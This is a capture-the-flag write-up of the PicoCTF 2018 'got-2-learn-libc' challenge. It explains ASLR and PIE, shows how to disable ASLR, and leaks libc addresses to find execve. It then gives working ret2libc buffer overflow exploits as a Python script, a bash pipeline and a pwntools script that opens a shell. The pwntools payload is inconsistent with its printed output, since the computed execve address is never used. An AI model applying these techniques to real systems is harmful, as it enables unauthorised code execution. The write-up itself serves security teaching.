PicoCTF 2018 - got-2-learn-libc

Note: This article is part of our PicoCTF 2018 BinExp Guide.

Spot the Bug

Here’s the good news: If you remember buffer overflow 2 at all, you should be able to spot the bug.

void vuln(){
  char buf[BUFSIZE];
  puts("Enter a string:");
  puts("Thanks! Exiting now...");


Here’s the bad news: There’s no easy win() function to call. Worse than that, this is our first taste of PIE.

$ checksec vuln
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled

So, what exactly is PIE and why do we care? A position-independent-executable is an executable made entirely from position-independent code. As a result, none of the addresses used by the code are absolute (ie: all addresses are relative), and the dynamic loader is free to load the program and it’s libraries at random base addresses every time it executes (this is part of a security feature known as Address Space Layout Randomization). ASLR has been turned on by default in most linux distributions for roughly 10 years now. In practice, it means that simple exploits become a lot more work because you don’t know where anything is in memory, it’s different from computer to computer, and it’s different every time the program executes.

In fact, even if your program itself isn’t compiled with PIE, if you use libc, then the libc portion is still loaded at a random base offset. This is important to know if you are attempting to call functions within the libc library.

If you run this program a couple times, you’ll see different addresses for all the libc functions (puts, flush, read,…) AS well as the address for the “useful_string”.

$ ./vuln
Here are some useful addresses:

puts: 0xf761d150
fflush 0xf761b340
read: 0xf7692440
write: 0xf76924b0
useful_string: 0x565d1030

Enter a string:
$ ./vuln
Here are some useful addresses:

puts: 0xf759a150
fflush 0xf7598340
read: 0xf760f440
write: 0xf760f4b0
useful_string: 0x5664c030

Enter a string:
$ ./vuln
Here are some useful addresses:

puts: 0xf7660150
fflush 0xf765e340
read: 0xf76d5440
write: 0xf76d54b0
useful_string: 0x56624030

Enter a string:

Now, if you wanted to disable ASLR (which generally makes it easier to debug/develop your exploit), you have two options:

  1. Disable it globally by running cat 0 > /proc/sys/kernel/randomize_va_space as root (0 to disable, 2 to enable)
  2. Disable it on only a single process by running setarch $(uname -m) -R ./program (or skip the ./program argument to instead run a shell that launches every program without ASLR)

Generally, I use step 1 when attempting to understand a challenge, and code my exploit to never assume knowledge any addresses. I then turn ASLR back on and verify everything works as expected.

The overall strategy for this challenge is exactly the same as the other buffer-overflow challenges:

  1. Do a buffer overflow to overwrite the return address on the stack
  2. Call into a function that will either give us a flag or a shell.

The complication here, of course, is that there is no trivial win() function to call. However, we are using functions from libc, and libc is a big library. In fact, if you recall from the guide for shellcode we know that libc has an implementation of execve which we can use to launch a shell. Plus, you already figured out how to pass arguments to the called function in the guide for buffer overflow 2.

Ready for the challenge? It’s at /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server.

Background Info

We are now faced with two problems: firstly, we don’t know what exact version of libc this program uses (later challenges actually provide a copy of libc to use), and secondly, we don’t know what address to call.

However, if we solve the first problem, and we observe the output of the program carefully, we can solve the second problem.

There are two ways to figure out the version of libc the program is using. The “easy” way and the “hard” way. We’ll go through the “hard” way first, and then use the “easy” way to double-check our work.

Remember how the program output the addresses of libc functions like puts, flush, and read? Well, that is actually some very useful information. The thing about ASLR is that it loads the entire library at a random offset, but it doesn’t move the bits and pieces of the library around. Therefore, the relative distance between puts and flush (for instance) is the same no matter what address the library gets loaded at. Moreover, if we know a couple of those distances, we can compare against a library of common libc versions and see if any of them match. There is actually a handy-dandy little website that will do all of that for you: https://libc.blukat.me/.

Looking back at the most recent output, we know puts was at 0xf7660150, fflush was at 0xf765e340, read was at 0xf76d5440, and write was at 0xf76d54b0.

Let’s put those values in and see what it gives us: … Hey, what do you know? Exactly one result: libc6-i386_2.23-0ubuntu11.2_amd64! It also gives us a download link, and you can click to see the offsets of all the symbols in the file. For now, Let’s make note of two symbols: puts and execve.

Symbol Offset
puts 0x0005f150
execve 0x000af670

Doing a little math, we know that whatever the address of puts is, we can expect that execve is 0xaf670 - 0x5f150 = 0x50520 bytes higher. So if puts was at 0xf7660150, we would expect execve to be at 0xf7660150 + 0x50520 = 0xF76B0670. You can even put together a quick python one-liner to do this math for you:

$ echo "0xf7660150" | python -c 'import sys; print(hex(int(sys.stdin.readline(),0) + 0x50520))' 

NOTE: Since we actually have access to the binary on the shell server, we can also directly access the version of libc it is using - let’s double check that our “guesses” were right.

$ cd /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33
$ ldd vuln
        linux-gate.so.1 =>  (0xf76e3000)
        libc.so.6 => /lib32/libc.so.6 (0xf751d000)
        /lib/ld-linux.so.2 (0xf76e4000)
$ objdump -T /lib32/libc.so.6 | grep -E " puts$| execve$"
0005f150  w   DF .text  000001d0  GLIBC_2.0   puts
000af670  w   DF .text  00000026  GLIBC_2.0   execve

Oh, and let’s not forget to check on the number of padding bytes:

; ...
sub    esp,0xc
lea    eax,[ebp-0x9c]
push   eax
call   5b0 <gets@plt>
add    esp,0x10

Since the buffer was 148 bytes, and 0x9c is 156, we can see there are 8 bytes of padding.


Putting it all together, the write to the buffer should look like this:

  1. 156 bytes of don’t care
  2. 4 bytes overwriting preserved ebp (also don’t care)
  3. 4 bytes return address for vuln (&puts + 0x50520 == &execve)
  4. 4 bytes return address for execve (don’t care - execve will never return)
  5. 4 bytes arg1 (useful_string)
  6. 4 bytes arg2 (0 - linux specific hack)
  7. 4 bytes arg3 (0 - linux specific hack)

Or, in python:

import sys, re, struct

p32 = lambda x : struct.pack('<L',x) #python2 version - packs 32 bit integer into 4 little-endian bytes

# read first 9 lines from stdin, grab the values we care about
matches = re.findall(r'(puts|useful_string): (.+)', "".join([sys.stdin.readline() for x in range(9)]))

execve = int(matches[0][1],0) + 0x50520
binsh = int(matches[1][1],0)
print("U"*(156+4) + p32(execve)) + "UUUU" + p32(binsh) + p32(0) + p32(0)

Let’s wrap that script in some bash magic to give us an interactive terminal and try it out at /problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33 on the shell server:

/problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33$ FIFO="$(mktemp -d)/fifo"; mkfifo $FIFO; cat $FIFO - | ./vuln | tee >(python -c 'import sys, re, struct; p32 = lambda x
 : struct.pack('\''<L'\'',x); matches = re.findall(r'\''(puts|useful_string): (.+)'\'', "".join([sys.stdin
.readline() for x in range(9)])); execve = int(matches[0][1],0) + 0x50520; binsh = int(matches[1][1],0); p
rint("U"*(156+4) + p32(execve)) + "UUUU" + p32(binsh) + p32(0) + p32(0)' > $FIFO; sleep infinity)
Here are some useful addresses:

puts: 0xf75ec150
fflush 0xf75ea340
read: 0xf7661440
write: 0xf76614b0
useful_string: 0x565cb030

Enter a string:
Thanks! Exiting now...
cat flag.txt

This script runs ./vuln, parses the output, constructs a buffer overflow, sends it back through a named pipe to the input of ./vuln, which overflows the buffer and launches a shell, and then it starts reading from stdin so you have access to an interactive terminal.

Of course, all of this bash magic is getting a little complicated, so we can do the exact same thing a little simpler using pwntools.

#!/usr/bin/env python3
# ~/got2learnlibc_exploit.py

from pwn import *

context.update(arch='i386', os='linux')

p = process("./vuln")

p.recvuntil("puts: 0x")

puts = u32(unhex(p.recvline(keepends=False)), endian='big')
print("puts @ " + hex(puts))

execve = puts + 0x50520
print("execve @ " + hex(execve))

p.recvuntil("useful_string: 0x")
binsh = u32(unhex(p.recvline(keepends=False)), endian='big')

p.recvline_contains("Enter a string:")

payload = b''.join([b'U'*(156+4),
    p32(0x55555555), #"return address from execve (not possible)"
    p32(binsh),   #"arg1"
    p32(0x00),  #"arg2"
    p32(0x00)]) #"arg3"

print("payload: " + enhex(payload))


/problems/got-2-learn-libc_3_6e9881e9ff61c814aafaf92921e88e33$ python ~/got2learnlibc_exploit.py
[+] Starting local process './vuln': pid 140986
puts @ 0xf7662150
execve @ 0xf76b2670
payload: 5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555570266bf755555555302057560000000000000000
[*] Switching to interactive mode
$ ls
flag.txt  vuln    vuln.c

For the most part, we will be using pwntools for the remaining challenges. Head back to the PicoCTF 2018 BinExp Guide to continue with the next challenge.